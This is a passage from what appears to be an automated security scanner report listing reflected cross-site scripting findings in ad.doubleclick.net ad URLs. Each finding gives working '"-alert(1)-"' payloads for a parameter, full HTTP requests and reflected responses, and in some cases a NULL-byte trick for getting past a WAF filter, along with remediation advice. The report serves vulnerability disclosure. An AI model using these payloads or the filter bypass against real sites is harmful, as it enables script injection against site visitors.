This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=%0042f87"-alert(1)-"8498af5b338&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5576
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 22:04:37 GMT
Expires: Wed, 27 Apr 2011 22:04:37 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
3Dv8/3af6/17/126/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=%0042f87"-alert(1)-"8498af5b338&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_
...[SNIP]...

3.85. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [rqid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0061853"-alert(1)-"3d4531fc5aa was submitted in the rqid parameter. This input was echoed as 61853"-alert(1)-"3d4531fc5aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E%0061853"-alert(1)-"3d4531fc5aa&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5588
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 22:06:51 GMT
Expires: Wed, 27 Apr 2011 22:06:51 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
0/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E%0061853"-alert(1)-"3d4531fc5aa&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA")
...[SNIP]...

3.86. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [sg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0030da6"-alert(1)-"9f29d88889c was submitted in the sg parameter. This input was echoed as 30da6"-alert(1)-"9f29d88889c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741%0030da6"-alert(1)-"9f29d88889c&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5588
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 22:00:34 GMT
Expires: Wed, 27 Apr 2011 22:00:34 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
ape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/12a/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741%0030da6"-alert(1)-"9f29d88889c&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.2
...[SNIP]...

3.87. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 592c7"-alert(1)-"714a4705579 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00592c7"-alert(1)-"714a4705579&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
53A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00592c7"-alert(1)-"714a4705579&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "fal
...[SNIP]...

3.88. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22207"-alert(1)-"42033c76780 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=5522207"-alert(1)-"42033c76780&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
160/%2a/i%3B234979442%3B2-0%3B0%3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=5522207"-alert(1)-"42033c76780&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=13039
...[SNIP]...

3.89. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85b43"-alert(1)-"5c6dd508a9d was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=085b43"-alert(1)-"5c6dd508a9d&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
3B4307-300/250%3B41001877/41019664/2%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=085b43"-alert(1)-"5c6dd508a9d&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&
...[SNIP]...

3.90. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7dfb5"-alert(1)-"406b18d8a5c was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=7dfb5"-alert(1)-"406b18d8a5c&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=7dfb5"-alert(1)-"406b18d8a5c&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcal
...[SNIP]...

3.91. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [cpnmodule parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ba13"-alert(1)-"266cdf29ddf was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=1ba13"-alert(1)-"266cdf29ddf&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=1ba13"-alert(1)-"266cdf29ddf&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
v
...[SNIP]...

3.92. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a000c"-alert(1)-"a796382a003 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=a000c"-alert(1)-"a796382a003&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=a000c"-alert(1)-"a796382a003&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/h
...[SNIP]...

3.93. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [epartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56f8d"-alert(1)-"1d00a0e4e7e was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=56f8d"-alert(1)-"1d00a0e4e7e&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

